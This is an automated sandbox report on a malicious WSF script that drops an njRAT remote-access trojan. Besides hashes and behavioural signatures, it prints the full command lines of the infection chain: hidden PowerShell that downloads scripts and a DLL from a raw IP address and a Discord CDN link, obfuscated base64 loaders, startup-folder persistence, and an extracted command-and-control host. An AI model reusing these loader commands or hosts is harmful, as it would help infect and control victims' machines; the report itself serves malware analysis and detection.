Analysis
-
max time kernel
146s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
22/09/2022, 19:00
Static task
static1
Behavioral task
behavioral1
Sample
e4fbe2c0de215885d004f354f1e57357.wsf
Resource
win7-20220812-en
General
-
Target
e4fbe2c0de215885d004f354f1e57357.wsf
-
Size
53KB
-
MD5
e4fbe2c0de215885d004f354f1e57357
-
SHA1
258f167a93a3f51fee1e05f6d401661b5ea63bd3
-
SHA256
ce6cdc61e1758c5abd949a017475171aea3dbd9571d45300990badd6006759c4
-
SHA512
a3c1c60d641226aef13be04eda4c3e30e8a0b658e5bae65b4b3a7beba692dd57e63e5d451169d10e2f535414855be26767657ca6e08164e9f609e7f74f749023
-
SSDEEP
192:L48w8Nlb0bqGW6CCCuqpS848w8Nlb0bqGW6CCCuqpd48w8Nlb0bqGW6CCCuqpJ:dwSb0cJqiwSb0cJzwSb0cJR
Malware Config
Extracted
http://5.42.199.120/dll/lannodll.txt
Extracted
njrat
0.7NC
NYAN CAT
wins2109ok.duckdns.org:8000
cfe0aa9d35c
-
reg_key
cfe0aa9d35c
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 6 3068 powershell.exe 14 1564 powershell.exe 15 1564 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1564 set thread context of 2356 1564 powershell.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3068 powershell.exe 3068 powershell.exe 2776 powershell.exe 2776 powershell.exe 1564 powershell.exe 1564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe Token: 33 2356 CasPol.exe Token: SeIncBasePriorityPrivilege 2356 CasPol.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4520 wrote to memory of 3068 4520 WScript.exe 79 PID 4520 wrote to memory of 3068 4520 WScript.exe 79 PID 3068 wrote to memory of 4920 3068 powershell.exe 81 PID 3068 wrote to memory of 4920 3068 powershell.exe 81 PID 2084 wrote to memory of 1360 2084 explorer.exe 83 PID 2084 wrote to memory of 1360 2084 explorer.exe 83 PID 1360 wrote to memory of 2776 1360 WScript.exe 84 PID 1360 wrote to memory of 2776 1360 WScript.exe 84 PID 2776 wrote to memory of 1564 2776 powershell.exe 88 PID 2776 wrote to memory of 1564 2776 powershell.exe 88 PID 1564 wrote to memory of 2356 1564 powershell.exe 90 PID 1564 wrote to memory of 2356 1564 powershell.exe 90 PID 1564 wrote to memory of 2356 1564 powershell.exe 90 PID 1564 wrote to memory of 2356 1564 powershell.exe 90 PID 1564 wrote to memory of 2356 1564 powershell.exe 90 PID 1564 wrote to memory of 2356 1564 powershell.exe 90 PID 1564 wrote to memory of 2356 1564 powershell.exe 90 PID 1564 wrote to memory of 2356 1564 powershell.exe 90
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ØØªÙ…ذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ØØªÙ…ذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs3⤵PID:4920
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE4AWQBnAE8AeABSAF凸凸凸A凸凸凸AAlACcAOwBbAEIAeQB0AG凸凸凸AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG凸凸凸AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA凸凸凸wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG凸凸凸AdAAuAFcAZQBiAEMAbABpAG凸凸凸AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA凸凸凸wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMQAyADAALwBkAGwAbAAvAGwAYQBuAG4AbwBkAGwAbAAuAHQAeAB0ACcAKQApADsAWwBzAHkAcwB0AG凸凸凸AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH凸凸凸ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG凸凸凸AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAwADAAMAA4AGsAbwA5ADAAMQAyAC8AOAA0ADgAMwA0ADkAMwAzADcAMAA2ADgAOAAyADkAMQAyADAAMQAvADEANwA1ADMANQAwADcAMgA4AD凸凸凸ANgA2ADcAMgA5ADEAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC0GKgZFBjAGRQbMBj凸凸凸GJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('凸凸凸','U') ) );$OWjuxDt = $OWjuxDt.replace('%NYgOxRUP%', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.120/dll/lannodll.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.0008ko9012/8483493370688291201/1753507285667291201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'حتمذمیص' ))"4⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
Filesize
1KB
MD54aaea8e990963328115bd59dee2bcda8
SHA12d7eed0a0a898811d6a149a4545ab3732477c01a
SHA256d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc
SHA512de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50
-
Filesize
153KB
MD5a0fa641e1fe743aa44d0b42c25243143
SHA15db55be1cbe8e19f55671e18ca2741e9a5d61c48
SHA2563e2e52d83f938c4bbe67d9369bb29866153ecc846aa7e9761e73dbfaa8a26041
SHA512e3f103df2bdc9590e738141159da75d63b9e61e60c85df689986157339641761c2269dd29fdbdea8838eaeec8c2569320682501a2df019f08222c8489110de4d